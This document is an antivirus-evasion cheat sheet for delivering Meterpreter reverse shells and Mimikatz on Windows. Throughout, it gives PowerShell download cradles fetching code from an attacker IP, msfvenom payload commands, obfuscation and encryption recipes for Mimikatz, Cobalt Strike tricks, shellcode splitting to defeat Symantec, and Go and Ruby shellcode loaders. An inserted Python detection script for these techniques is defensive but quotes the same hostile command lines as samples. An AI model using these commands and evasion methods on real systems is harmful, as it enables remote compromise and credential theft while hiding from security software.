>powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

Loading with Invoke-Shellcode

Generate the code:
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f powershell -o /var/www/html/1.ps1
Run on the target:
> powershell -ep bypass
> IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/powersploit/CodeExecution/Invoke-Shellcode.ps1')
> IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/1.ps1')
> Invoke-Shellcode -Shellcode ($buf) -Force

The protection software does not react.

Invoke-Obfuscation

https://github.com/danielbohannon/Invoke-Obfuscation
Generate the code:
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f psh -o /var/www/html/1.ps1
>powershell -ep bypass
>Import-Module .\Invoke-Obfuscation.psd1
>Invoke-Obfuscation
>set scriptpath C:\Users\y\Desktop\1.ps1
>encoding
>3   choose the encoding method
>out C:\Users\y\Desktop\ok.ps1   save

Run:
>powershell -ep bypass -noexit -file ok.ps1

Xencrypt

https://github.com/the-xentropy/xencrypt/blob/master/xencrypt.ps1
>Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100   recursive layering to evade dynamic detection

>Invoke-Xencrypt -infile .\Invoke-Mimikatz.ps1 -outfile mimi.ps1

PyFuscation

https://github.com/CBHue/PyFuscation
Obfuscates functions, parameters and variables.
>python3 PyFuscation.py -fvp --ps Invoke-Mimikatz.ps1

Splitting + C compilation

#include<stdio.h>
#include<stdlib.h>
int main(){
system("powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)");
return 0;
}

Behaviour detection

>powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz"
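Added example on the defending side (not code from the original post or from any tool it names): a small triage script for process-creation records that covers the PowerShell tricks shown above (-EncodedCommand, the repeated -w Normal flags, the split download cradle, "ke"+"rne"+"l32.dll"-style string concatenation) together with the rundll32-javascript, mshta, InstallUtil /U and remote-MSBuild launchers from the CHM, Mshta, CSC+InstallUtil and MSBuild sections. The pipe-separated record format, the rule names and every line in sample_log() are constructed for this example; the encoded command is computed at run time from a plain download cradle so the sample is reproducible offline.

```python
"""Triage of process-creation records for the PowerShell and LOLBin execution chains above."""
import base64
import re

INDICATORS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "frombase64string", "virtualalloc", "createthread", "kernel32")
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "wscript.exe", "cscript.exe"}

# -e / -ec / -en / -enc / -encodedcommand followed by the Base64 blob (-ep is ExecutionPolicy, excluded)
ENC_RE = re.compile(r"(?<![\w-])-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CONCAT_RE = re.compile(r"""['"]\s*\+\s*['"]""")      # 'ke'+'rne'+'l32.dll' -> 'kernel32.dll'
WINDOW_RE = re.compile(r"-w(?:indowstyle)?\s+\w+", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or not valid Base64."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", "ignore")
    except ValueError:
        return None


def indicators_in(text):
    low = text.lower()
    return {i for i in INDICATORS if i in low}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_cmdline(parent, image, cmdline):
    """Return the names of the rules that fire for one record (constructed rule names)."""
    hits, img = [], basename(image)
    decoded = decode_encoded_command(cmdline) or ""
    visible = ENC_RE.sub("-enc <blob>", cmdline)      # keep Base64 noise out of substring matching
    found = indicators_in(visible) | indicators_in(decoded)
    if decoded and indicators_in(decoded):
        hits.append("encoded_command")
    if len(WINDOW_RE.findall(visible)) > 3:
        hits.append("window_flag_stuffing")
    if indicators_in(CONCAT_RE.sub("", visible)) - found:
        hits.append("string_concat_hides_indicator")
    if found & {"downloadstring", "net.webclient"}:
        hits.append("remote_script_download")
    low = visible.lower()
    if img == "rundll32.exe" and "javascript:" in low:
        hits.append("rundll32_javascript")
    if img == "mshta.exe" and "http" in low:
        hits.append("mshta_remote_hta")
    if img == "installutil.exe" and re.search(r"\s/u\b", low):
        hits.append("installutil_uninstall_exec")
    if img == "msbuild.exe" and (".xml" in low or "\\\\" in low):
        hits.append("msbuild_inline_task")
    if basename(parent) in OFFICE and img in SCRIPT_HOSTS:
        hits.append("office_child_process")
    return hits


def analyze_log(lines):
    """lines: 'timestamp|parent_image|image|command_line' records (constructed format)."""
    results = []
    for n, line in enumerate(lines):
        ts, parent, image, cmdline = line.split("|", 3)
        results.append({"line": n, "time": ts, "image": basename(image),
                        "hits": analyze_cmdline(parent, image, cmdline)})
    return results


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC = base64.b64encode(
    "IEX(New-Object Net.WebClient).DownloadString('http://192.0.2.10/1.ps1')".encode("utf-16le")).decode()


def sample_log():
    """Constructed records: one benign line followed by one line per technique."""
    return [
        r"2024-03-01T09:00:00|explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\y\notes.txt",
        f"2024-03-01T09:01:00|winword.exe|{PS}|powershell -ep bypass -enc {ENC}",
        f"2024-03-01T09:02:00|cmd.exe|{PS}|powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal "
        + "\"IEX(New-Object Net.WebClient).DownloadString('http://192.0.2.10/Invoke-Mimikatz.ps1')\"",
        f"2024-03-01T09:03:00|cmd.exe|{PS}|powershell -noexit \"$c1='IEX(New-Object Net.WebClient).Downlo';"
        + "$c2='123(''http://192.0.2.10/1.ps1'')'.Replace('123','adString');IEX ($c1+$c2)\"",
        f"2024-03-01T09:04:00|cmd.exe|{PS}|powershell -c \"$d='ke'+'rne'+'l32.dll'; $f='Virtual'+'Alloc'\"",
        r"2024-03-01T09:05:00|hh.exe|C:\Windows\System32\rundll32.exe|rundll32.exe javascript:"
        + r'"\..\mshtml,RunHTMLApplication ";h=new ActiveXObject("WinHttp.WinHttpRequest.5.1");eval(h.ResponseText)',
        r"2024-03-01T09:06:00|cmd.exe|C:\Windows\System32\mshta.exe|mshta http://192.0.2.10:1222/1.hta",
        r"2024-03-01T09:07:00|cmd.exe|C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe|"
        + r"InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe",
        r"2024-03-01T09:08:00|wmiprvse.exe|C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe|"
        + r"msbuild.exe \\192.0.2.10\share\msbuild_nps.xml",
    ]


if __name__ == "__main__":
    for r in analyze_log(sample_log()):
        print(r["line"], r["image"], r["hits"])
```

The split cradle from the behaviour-detection bypass still fires remote_script_download because the Net.WebClient token survives the split, while the kernel32 concatenation is only caught after collapsing the '+'-joined literals; a real deployment would feed Sysmon event 1 or Windows 4688 records with command-line auditing enabled into analyze_cmdline and alert on any non-empty hit list.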

Out-EncryptedScript

http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1
>Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password shabiisme -Salt 123456

PS > IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1")
PS > [String] $cmd = Get-Content .\evil.ps1
PS > Invoke-Expression $cmd
PS > $decrypted = de shabiisme 123456
PS > Invoke-Expression $decrypted
PS > Invoke-Mimikatz

Cobalt Strike PowerShell evasion

From: https://y4er.com/post/cobalt-strike-powershell-bypass/
powershell>$string = ''
powershell>$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('[shellcode generated by CS]')
powershell>$s |foreach { $string = $string + $_.ToString()+','}
powershell>$string>c:\1.txt
Modify the PS script:
[Byte[]]$var_code = [Byte[]](payload)
Then obfuscate the functions and variables.
Bypassing interception of executed commands:
use CS argument spoofing
beacon > argue cmd.exe blablabla

Chunked evasion

Generate:
msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.0.108 LPORT=443 -f psh-net -o shity_shellcode.ps1

First a test: replace the shellcode in the ps1 file with a harmless string.

The result: it still gets flagged.

This shows that most of the detection targets the PowerShell template rather than the shellcode itself.
Several bypass methods follow:
1. Split strings into several parts and create intermediate variables;
2. Add large amounts of junk comments;
3. Add some junk instructions, such as loops or sleeps (useful against sandboxes).
[DllImport("kernel32.dll")]
becomes
[DllImport("ke"+"rne"+"l32.dll")] #gets past Symantec
$przdE.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location))
becomes
$magic="Syst"+"em"+".dll";
$przdE.ReferencedAssemblies.AddRange(@($magic,[PsObject].Assembly.Location))
Split the shellcode:
$sc0=<part 1 of the shellcode>; …$sc7=<part 8 of the shellcode>; [Byte[]]$tcomplete_sc=[System.Convert]::FromBase64String($sc0+$sc1+…+$sc7)
Some details can be found in
https://raw.githubusercontent.com/kmkz/Pentesting/master/AV_Evasion/AV_Bypass.ps1
I don't really understand assembly, so I did not add harmless instructions.
Here I just use the one-click bash script; if you have time, read through the commands in it:
https://github.com/darksh3llRU/tools/blob/master/psh-net_shellcode_fastchange.sh
This script generates an hta and splits the shellcode into chunks of 1337 characters.

In my tests, 1337-character chunks were detected by Symantec, so I changed it to chunks of 250 characters.

Since I did not add assembly instructions, just press any key to skip this step; if you know how, you can add some instructions at the beginning, such as xor, inc, dec, add, sub, mov, nop.

After it finishes, some files are generated.

We only use the file final_pshnet_revhttps.ps1; open it and modify it.

Modify it to: [screenshots of the edited file not included]

Ruby

When the target machine has Ruby installed.
Generate:
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f ruby
Paste it into the Ruby script.

Run:
>ruby xx.ruby

Golang

Generate:
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c
Convert the code to 0x format, paste it into go.txt and save it as a .go file.

Install the Go environment and run in the shellcode directory:
>go build   generates the exe

Loaders

go-shellcode

https://github.com/brimstone/go-shellcode
Enter the cmd/sc directory and build sc.exe:
>go build

Generate:
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f hex -o shell.txt
Load the shellcode with the loader:
>sc.exe shellcode

Gsl

https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip
>gsl -s SHELLCODE -hex   hex format generated by msf
>gsl -f shell.raw   load a local raw-format file
>gsl -f shell.hex -hex   load a local hex-format file
>gsl -u http://192.168.0.108/1.raw   load remotely
>gsl -u http://192.168.0.108/1.hex